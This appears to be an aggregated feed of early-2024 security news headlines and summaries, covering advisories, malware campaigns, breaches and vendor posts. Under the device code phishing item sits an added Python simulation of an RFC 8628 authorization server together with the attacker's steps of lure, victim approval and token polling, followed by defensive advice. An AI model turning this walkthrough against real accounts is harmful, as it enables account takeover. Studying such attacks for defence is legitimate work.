Royal Hansen, Vice President of Privacy, Safety and Security EngineeringThis week, the United Nations convened member states to continue its years-long negotiations on the UN Cybercrime Treaty, titled “Countering the Use of Information and Communications Technologies for Criminal Purposes.” As more aspects of our lives intersect with the digital sphere, law enforcement around the world has increasingly turned to electronic evidence to investigate and disrupt criminal activity. Google takes the threat of cybercrime very seriously, and dedicates significant resources to combating it. When governments send Google legal orders to disclose user data in connection with their investigations, we carefully review those orders to make sure they satisfy applicable laws, international norms,...
http://security.googleblog.com/2024/02/un-cybercrime-treaty-could-endanger-web.html

Connect with Microsoft at these cybersecurity events in 2024
Cybersecurity professionals, business decision makers, and developers involved in cybersecurity have many industry events to choose from. But with all the possibilities, they may be unsure which one is right for them. Read on for recommendations based on your role.
https://www.microsoft.com/en-us/security/blog/2024/02/01/connect-with-microsoft-at-these-cybersecurity-events-in-2024/

Atlassian Confluence Remote Code Execution (CVE-2023-22527)
What is the Vulnerability? On Jan 16, 2024, Atlassian released an advisory for a template injection vulnerability in Confluence Data Center and Server that allows an unauthenticated attacker to execute arbitrary code remotely on affected versions. The vulnerability carries a CVSS severity of 10.0 (Critical). What is the Vendor Solution? Atlassian strongly recommends upgrading to the latest version listed in its advisory. What FortiGuard Coverage is available? FortiGuard Labs has an IPS signature "Atlassian.Confluence.CVE-2023-22527.Remote.Code.Execution" in place for CVE-2023-22527 and is seeing active exploitation attempts against this vulnerability.
https://fortiguard.fortinet.com/threat-signal-report/5376

3 new ways the Microsoft Intune Suite offers security, simplification, and savings
The main components of the Microsoft Intune Suite are now generally available. Read about how consolidated endpoint management adds value and functionality for security teams.
https://www.microsoft.com/en-us/security/blog/2024/02/01/3-new-ways-the-microsoft-intune-suite-offers-security-simplification-and-savings/

Guide to Secure Data Backup for Linux Users
Data security in a modern business environment is considered one of the most critical factors for any company. The digitalization of the world has led to more and more data being generated daily, including very sensitive data, such as internal business plans, customer payment data, etc.
https://linuxsecurity.com/features/features/secure-data-backup-linux

Audio-jacking: Using generative AI to distort live audio transactions
While the evolution of LLMs marks a new era of AI, we must be mindful that new technologies come with new risks. Explore one such risk, called "audio-jacking."
https://securityintelligence.com/posts/using-generative-ai-distort-live-audio-transactions/

VajraSpy: A Patchwork of espionage apps
ESET researchers discovered several Android apps carrying VajraSpy, a RAT used by the Patchwork APT group
https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/

Scaling security with AI: from detection to solution
Dongge Liu and Oliver Chang, Google Open Source Security Team, Jan Nowakowski and Jan Keller, Machine Learning for Security TeamThe AI world moves fast, so we've been hard at work keeping security apace with recent advancements. One of our approaches, in alignment with Google's Secure AI Framework (SAIF), is using AI itself to automate and streamline routine and manual security tasks, including fixing security bugs. Last year we wrote about our experiences using LLMs to expand vulnerability testing coverage, and we're excited to share some updates. Today, we're releasing our fuzzing framework as a free, open source resource that researchers and developers can use to improve fuzzing's bug-finding abilities. We'll also show you how we're using AI to speed up the bug patching...
http://security.googleblog.com/2024/01/scaling-security-with-ai-from-detection.html

Tax Season is Upon Us, and So Are the Scammers

https://www.proofpoint.com/us/newsroom/news/tax-season-upon-us-and-so-are-scammers

Data security posture management vs cloud security posture management
“A data breach has just occurred” is a phrase no security professional wants to hear. From the CISO down to the SOC analysts, a data breach is the definition of a very bad day. It can cause serious brand damage and financial loss for enterprises, lead to abrupt career changes among security professionals, and […]
https://securityintelligence.com/posts/data-security-vs-cloud-security-posture-management/

Azure Devops Zero-Click CI/CD Vulnerability
The Legit Security research team has found and reported a zero-click attack that allowed attackers to submit malicious code and access secrets. The vulnerability does not require any action from the project maintainer, making it a zero-click supply chain vulnerability.
https://www.legitsecurity.com/blog/azure-devops-zero-click-ci/cd-vulnerability

ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
A network of over 130k domains was part of a campaign to deliver scareware, PUPs and other scams. We unravel the threads of this campaign from entry point to payload.
https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/

ESET Research Podcast: ChatGPT, the MOVEit hack, and Pandora
An AI chatbot inadvertently kindles a cybercrime boom, ransomware bandits plunder organizations without deploying ransomware, and a new botnet enslaves Android TV boxes
https://www.welivesecurity.com/en/eset-research/eset-research-podcast-chatgpt-moveit-hack-pandora/

ICS and OT threat predictions for 2024
Kaspersky experts make their predictions about ICS and OT threats: specifically, ransomware and hacktivist attacks, threats to logistics and transportation, etc.
https://securelist.com/ksb-ics-predictions-2024/111835/

Fla. Man Charged in SIM-Swapping Spree is Key Suspect in Hacker Groups Oktapus, Scattered Spider
On Jan. 9, 2024, U.S. authorities arrested a 19-year-old Florida man charged with wire fraud, aggravated identity theft, and conspiring with others to use SIM-swapping to steal cryptocurrency. Sources close to the investigation tell KrebsOnSecurity the accused was a key member of a criminal hacking group blamed for a string of cyber intrusions at major U.S. technology companies during the summer of 2022.
https://krebsonsecurity.com/2024/01/fla-man-charged-in-sim-swapping-spree-is-key-suspect-in-hacker-groups-oktapus-scattered-spider/

Effortlessly upgrade to Passkeys on Pixel phones with Google Password Manager
Posted by Sherif Hanna, Group Product Manager, Pixel Security Helping Pixel owners upgrade to the easier, safer way to sign in Your phone contains a lot of your personal information, from financial data to photos. Pixel phones are designed to help protect you and your data, and make security and privacy as easy as possible. This is why the Pixel team has been especially excited about passkeys—the easier, safer alternative to passwords. Passkeys are safer because they're unique to each account, and are more resistant against online attacks such as phishing. They're easier to use because there's nothing for you to remember: when it's time to sign in, using a passkey is as simple as unlocking your device with your face or fingerprint, or your PIN/pattern/password. Google is...
http://security.googleblog.com/2024/01/upgrade-to-passkeys-on-pixel-with-google-password-manager.html

Mapping attacks on generative AI to business impact
In recent months, we’ve seen government and business leaders put an increased focus on securing AI models. If generative AI is the next big platform to transform the services and functions on which society as a whole depends, ensuring that the technology is trusted and secure must be businesses’ top priority. While generative AI adoption is […]
https://securityintelligence.com/posts/mapping-attacks-generative-ai-business-impact/

ESET takes part in global operation to disrupt the Grandoreiro banking trojan
ESET provided technical analysis, statistical information, known C&C servers and was able to get a glimpse of the victimology
https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/

Device Code Phishing – Add Your Own Sign-In Methods on Entra ID
TL;DR An attacker is able to register new security keys (FIDO) or other authentication methods (TOTP, Email, Phone etc.) after a successful device code phishing attack. This allows an attacker to backdoor the account (FIDO) or perform the self-service password reset for the account with the newly registered sign-in methods. Microsoft deemed this not a vulnerability.
https://blog.compass-security.com/2024/01/device-code-phishing-add-your-own-sign-in-methods-on-entra-id/
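The precondition for the post-phish step described above is that a device code phish hands the attacker's client a token for the victim's account without the victim ever visiting an attacker-controlled page. The following is an added example in Python, not Compass Security's tooling and not Entra ID's endpoints: a constructed in-memory authorization server implementing the RFC 8628 device flow (device-code request, user approval, polling with `authorization_pending` / `expired_token` / `invalid_grant`), and the attacker's side of the exchange against it. Endpoint URL, client id, scope string and code formats are all made up for the example.

```python
import secrets
from typing import Dict


class DeviceAuthServer:
    """Constructed RFC 8628 device-flow server. Generic RFC behaviour only;
    Entra ID's real endpoints, code format and error bodies differ."""

    def __init__(self, lifetime: int = 900, interval: int = 5) -> None:
        self.lifetime = lifetime            # seconds a device_code stays valid
        self.interval = interval            # minimum polling interval for the client
        self.pending: Dict[str, Dict] = {}  # device_code -> grant state

    def device_authorization(self, client_id: str, scope: str, now: int) -> Dict:
        """Step 1: the client (here the attacker's tool) asks for a code pair."""
        device_code = secrets.token_urlsafe(32)
        user_code = secrets.token_hex(4).upper()   # what the victim will be asked to type
        self.pending[device_code] = {"user_code": user_code, "client_id": client_id,
                                     "scope": scope, "issued": now, "user": None}
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example.invalid/device",
                "expires_in": self.lifetime, "interval": self.interval}

    def user_approves(self, user_code: str, username: str) -> bool:
        """Step 2: the victim types the code on the genuine sign-in page and authenticates
        there. No attacker-controlled URL is involved, which is why URL inspection and
        password managers do not help against this phish."""
        for grant in self.pending.values():
            if grant["user_code"] == user_code and grant["user"] is None:
                grant["user"] = username
                return True
        return False

    def token(self, device_code: str, client_id: str, now: int) -> Dict:
        """Step 3: the client polls. Tokens go to whoever holds the device_code,
        i.e. the party that started the flow, not the party that approved it."""
        grant = self.pending.get(device_code)
        if grant is None or grant["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if now - grant["issued"] > self.lifetime:
            del self.pending[device_code]
            return {"error": "expired_token"}
        if grant["user"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]
        return {"access_token": "at-" + secrets.token_hex(8), "token_type": "Bearer",
                "scope": grant["scope"], "sub": grant["user"]}


def run_phish(server: DeviceAuthServer, victim_enters_code: bool, polls: int = 3) -> Dict:
    """Attacker side of the exchange. Returns the final token-endpoint response."""
    now = 0
    auth = server.device_authorization("attacker-cli", "openid profile offline_access", now)
    # The lure is the only thing the victim ever receives; it points at the real IdP.
    lure = f"Enter code {auth['user_code']} at {auth['verification_uri']}"
    if victim_enters_code:
        server.user_approves(auth["user_code"], "victim@example.invalid")
    response: Dict = {"error": "authorization_pending", "lure": lure}
    for _ in range(polls):
        now += auth["interval"]
        response = server.token(auth["device_code"], "attacker-cli", now)
        if response.get("error") != "authorization_pending":
            break
    return response
```

With the token in hand, the attacker is in the position the post describes: able to enrol a FIDO key or another sign-in method and then reset the password through self-service. Since Microsoft does not treat the follow-on as a vulnerability, the controls are on the tenant side: restrict the device code flow to the accounts and apps that genuinely need it, and alert on a new authentication method registered shortly after a device-code sign-in from an unfamiliar location.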

Join us at InfoSec Jupyterthon 2024
Jupyter notebooks are continuing to grow in popularity in information security as an alternative or supplement to mainstream security operations center (SOC) tools. Notebooks can be used interactively for threat detection and response, or as automated tasks in a larger pipeline. Their flexibility and ability to combine code, data analysis, and visualization in a single, […]
https://www.microsoft.com/en-us/security/blog/2024/01/29/join-us-at-infosec-jupyterthon-2024/

Best practices in moving to cloud native endpoint management
This blog is the second of three that detail our recommendation to adopt cloud native device management. Understand the lessons from various Intune customers in their journeys and how they achieved greater security, cost savings, and readiness for the future through their cloud transformations.
https://www.microsoft.com/en-us/microsoft-365/blog/2024/01/29/best-practices-in-moving-to-cloud-native-endpoint-management/

Ermac malware: The other side of the code
When the Cerberus code was leaked in late 2020, IBM Trusteer researchers projected that a new Cerberus mutation was just a matter of time. Multiple actors used the leaked Cerberus code, but without significant changes to the malware. However, MalwareHunterTeam discovered a new variant of Cerberus, known as Ermac (also known as Hook) […]
https://securityintelligence.com/posts/ermac-malware-the-other-side-of-the-code/

Mitigate Enterprise Software Supply Chain Security Risks - Insights Into the Gartner® Report
Gain insights into the Gartner® report and learn how to mitigate enterprise software supply chain risks by integrating software supply chain security into vendor risk management.
https://www.legitsecurity.com/blog/mitigate-enterprise-software-supply-chain-security-risks-insights-into-the-gartner-report

Cyber: The Swiss army knife of tradecraft
In today's digitally interconnected world, advanced cyber capabilities have become an exceptionally potent and versatile tool of tradecraft for nation-states and criminals alike
https://www.welivesecurity.com/en/cybersecurity/cyber-swiss-army-knife-tradecraft/

16-30 November 2023 Cyber Attacks Timeline
In the latter half of November 2023, I collected 207 cybersecurity events, with ransomware dominating at 34.78%. Financial technology sector hacks led to 7 million in crypto losses, along with significant data breaches and cyber espionage by groups from Palestine, North Korea, China, and Russia.
https://www.hackmageddon.com/2024/01/29/16-30-november-2023-cyber-attacks-timeline/

MyPertamina - 5,970,416 breached accounts
In November 2022, the Indonesian oil and gas company Pertamina suffered a data breach of their MyPertamina service. The incident exposed 44M records with 6M unique email addresses along with names, dates of birth, genders, physical addresses and purchases.
https://haveibeenpwned.com/PwnedWebsites#MyPertamina

DevSecOps maturity model: A beginner's guide
In recent years, DevSecOps swiftly emerged as a crucial new paradigm in software development, prioritizing the integration of security into DevOps practices.
https://blog.sonatype.com/devsecops-maturity-model-a-beginners-guide

Who is Alleged Medibank Hacker Aleksandr Ermakov?
Authorities in Australia, the United Kingdom and the United States this week levied financial sanctions against a Russian man accused of stealing data on nearly 10 million customers of the Australian health insurance giant Medibank. 33-year-old Aleksandr Ermakov allegedly stole and leaked the Medibank data while working with one of Russia's most destructive ransomware groups, but little more is shared about the accused. Here's a closer look at the activities of Mr. Ermakov's alleged hacker handles.
https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/

DORA and your quantum-safe cryptography migration
Quantum computing is a new paradigm with the potential to tackle problems that classical computers cannot solve today. Unfortunately, this also introduces threats to the digital economy and particularly the financial sector. The Digital Operational Resilience Act (DORA) is a regulatory framework that introduces uniform requirements across the European Union (EU) to achieve a “high […]
https://securityintelligence.com/posts/dora-quantum-safe-cryptography-migration/

Blackwood hijacks software updates to deploy NSPX30 – Week in security with Tony Anscombe
The previously unknown threat actor used the implant to target Chinese and Japanese companies, as well as individuals in China, Japan, and the UK
https://www.welivesecurity.com/en/videos/blackwood-software-updates-nspx30-week-security-tony-anscombe/

Midnight Blizzard: Guidance for responders on nation-state attack
The Microsoft security team detected a nation-state attack on our corporate systems on January 12, 2024, and immediately activated our response process to investigate, disrupt malicious activity, mitigate the attack, and deny the threat actor further access. The Microsoft Threat Intelligence investigation identified the threat actor as Midnight Blizzard, the Russian state-sponsored actor also known as NOBELIUM.
https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/

Using Google Search to Find Software Can Be Risky
Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.
https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky/

npm flooded with 748 packages that store movies
Meet npmjs.com, a video and eBook hosting platform — not our words, but it seems that's what goes in the mind of some users (and attackers) recently seen misusing the platform to store media like multi-gig movies, videos, and eBooks.
https://blog.sonatype.com/npm-flooded-with-748-packages-that-store-movies

Recap: Elite Pentesters Tell All in a Live Q&A
Three elite HackerOne pentesters recently shared their stories in a live AMA session that looked at the impact and results of community-driven pentesting.
https://www.hackerone.com/penetration-testing/pentester-ama-recap

Updated SBOM guidance: A new era for software transparency?
The cost of cyberattacks on software supply chains is a growing problem, with the average data breach costing $4.45 million in 2023. Since President Biden’s 2021 executive order, software bills of materials (SBOMs) have become a cornerstone in protecting supply chains. In December 2023, the National Security Agency (NSA) published new guidance to help organizations […]
https://securityintelligence.com/articles/updated-sbom-guidance-2024/

Investigating Worldwide SMS Scams, and Tens of Millions of Dollars in Fraud
SMS services remain a critical part of telecommunications; they don't require Internet access, and companies use them to inform their customers. This combination of features makes them incredibly useful for criminals who use the technology as a stepping stone in their never-ending campaigns. And if you think that the new RCS messaging standard [https://en.wikipedia.org/wiki/Rich_Communication_Services] will offer any protection, you would be wrong. These types of scams will continue to spread re
https://www.bitdefender.com/blog/labs/investigating-worldwide-sms-scams-and-tens-of-millions-of-dollars-in-fraud/

New Year, New Initiatives for the NIST Privacy Framework!
It's been four years since the release of The NIST Privacy Framework: A Tool for Improving Privacy Through Enterprise Risk Management, Version 1.0. Since then, many organizations have found it highly valuable for building or improving their privacy programs. We've also been able to add a variety of resources to support its implementation. We're proud of how much has been accomplished in just a few short years, but we're not resting on our laurels. As another, more famous, Dylan once said, “the times they are a-changin'.” For example, the past year has seen the release of the NIST AI Risk
https://www.nist.gov/blogs/cybersecurity-insights/new-year-new-initiatives-nist-privacy-framework

Privacy predictions for 2024
Kaspersky experts review their privacy predictions for 2023 and last year's trends, and try to predict what privacy concerns and solutions are to come in 2024.
https://securelist.com/ksb-privacy-predictions-2024/111815/

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate. You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build; all dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags: clamav/clamav:unstable, clamav/clamav:unstable_base, clamav/clamav-debian:unstable, clamav/clamav-debian:unstable_base. This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html

Fake 'distube-config' npm package drops Windows info-stealing malware
Sonatype has identified two npm packages distube-config and discordyt that typosquat open source packages like Discord modules, in an attempt to infect Windows users with a Trojan. Our security researcher, Juan Aguirre, who analyzed the malware shares some insights.
https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware

Sensor Intel Series: Top CVEs in December 2023
We add 6 CVEs to our list and do a brief roundup of some stats from 2023.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-december-2023

Privacy Attacks in Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or the CDEI blog . Our first post in the series introduced the concept of federated learning—an approach for training AI models on distributed data by sharing model updates instead of training data. At first glance, federated learning seems to be a perfect fit for privacy since it completely avoids sharing data
https://www.nist.gov/blogs/cybersecurity-insights/privacy-attacks-federated-learning

SLSA Provenance Blog Series, Part 4: Implementation Challenges for SLSA Provenance for Enterprises
In previous parts of the series, we dived into the concept of SLSA Provenance and the in-toto framework that empowers it. Next, we learned about the challenges of adopting SLSA provenance as an enterprise. In this post, we finally discuss the solution and the challenges and learn how you can use SLSA Provenance to secure your enterprise pipelines.
https://www.legitsecurity.com/blog/slsa-provenance-blog-series-part-4-implementation-challenges

Managed Security Services Provider (MSSP) Market News: 23 January 2024

https://www.proofpoint.com/us/newsroom/news/managed-security-services-provider-mssp-market-news-23-january-2024

Threat Assessment: BianLian
We analyze the extremely active ransomware group BianLian. Mostly targeting healthcare, the group has moved from double extortion to extortion without encryption.
https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/

Trello - 15,111,945 breached accounts
In January 2024, data was scraped from Trello and posted for sale on a popular hacking forum. Containing over 15M email addresses, names and usernames, the data was obtained by enumerating a publicly accessible resource using email addresses from previous breach corpuses. Trello advised that no unauthorised access had occurred.
https://haveibeenpwned.com/PwnedWebsites#Trello

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`. In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`. ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html

Burpsuite for Pentester: Autorize
In order to protect online assets, web application security testing is an essential element of safeguarding them. Burp Suite has been a leader in this
https://www.hackingarticles.in/burpsuite-for-pentester-autorize/

Widespread phishing campaign deployed by reemerging TA866

https://www.proofpoint.com/us/newsroom/news/widespread-phishing-campaign-deployed-reemerging-ta866

Cracked software beats gold: new macOS backdoor stealing cryptowallets
We review a new macOS backdoor that piggybacks on cracked software to replace Bitcoin and Exodus wallets with malware.
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/

Invoice Phishing Alert: TA866 Deploys WasabiSeed & Screenshotter Malware

https://www.proofpoint.com/us/newsroom/news/invoice-phishing-alert-ta866-deploys-wasabiseed-screenshotter-malware

Parrot TDS: A Persistent and Evolving Malware Campaign
Traffic detection system Parrot has infected tens of thousands of websites worldwide. We outline the scripting evolution of this injection campaign and its scope. The post Parrot TDS: A Persistent and Evolving Malware Campaign appeared first on Unit 42.
https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/

Apache OFBiz Authentication Bypass (CVE-2023-51467, CVE-2023-49070)
What is the vulnerability? There is an authentication bypass vulnerability in Apache OFBiz tracked under CVE-2023-51467 and CVE-2023-49070. Successful exploitation would let an attacker circumvent authentication processes, enabling them to remotely execute arbitrary code and access sensitive information. Apache OFBiz is an open-source business application suite for Enterprise Resource Planning (ERP) which integrates and automates many of the business processes across industries. What is the Vendor Solution? Customers are advised to upgrade to Apache OFBiz version 18.12.11 to patch these vulnerabilities. For more information, please refer to the Apache Security Advisory. What FortiGuard Coverage is available? FortiGuard Labs has an IPS signature "Apache.OFBiz.CVE-2023-49070.XMLRPC.Insecure.Deserialization"...
https://fortiguard.fortinet.com/threat-signal-report/5363

How to Find Mistakes Earlier and Save Money With Code Security Audit
Learn how organizations can find mistakes earlier and save an average of ,037 using Code Security Audit.
https://www.hackerone.com/vulnerability-management/find-mistakes-save-money-code-security-audit

GitHub, PyTorch and More Organizations Found Vulnerable to Self-Hosted Runner Attacks
Last July, we published an article exploring the dangers of vulnerable self-hosted runners and how they can lead to severe software supply chain attacks. A recent blog post by security researcher and bug bounty hunter Adnan Khan provides strong evidence for the threats we outlined and their destructive outcomes. GitHub itself was found vulnerable, as well as various notable organizations, such as PyTorch, Tensorflow, Microsoft DeepSpeed, and Chia Networks.
https://www.legitsecurity.com/blog/github-pytorch-and-more-organizations-found-vulnerable-to-self-hosted-runner-attacks

Stream-Jacking 2.0: Deep fakes power account takeovers on YouTube to maximize crypto-doubling scams
As of October 2023, researchers at Bitdefender Labs have been actively keeping tabs [https://www.bitdefender.com/blog/labs/a-deep-dive-into-stream-jacking-attacks-on-youtube-and-why-theyre-so-popular/] on stream-jacking attacks against high-profile YouTube accounts used to conduct a myriad of crypto doubling scams. Fast forward to 2024; our investigation into the fraudulent takeovers and usage of YouTube accounts has rendered new findings, as financially motivated threat actors meticulously evo
https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/

Naz.API - 70,840,771 breached accounts
In September 2023, over 100GB of stealer logs and credential stuffing lists titled "Naz.API" was posted to a popular hacking forum. The incident contained a combination of email address and plain text password pairs alongside the service they were entered into, and standalone credential pairs obtained from unnamed sources. In total, the corpus of data included 71M unique email addresses and 100M unique passwords.
https://haveibeenpwned.com/PwnedWebsites#NazApi

Dark web threats and dark market predictions for 2024
An overview of last year's predictions for corporate and dark web threats and our predictions for 2024.
https://securelist.com/darknet-predictions-for-2024/111763/

Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 8)
Multiple CVEs affecting Ivanti products: CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, CVE-2024-21893 and CVE-2023-46805 are detailed in this threat brief. The post Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 8) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/

Rotating credentials for GitHub.com and new GHES patches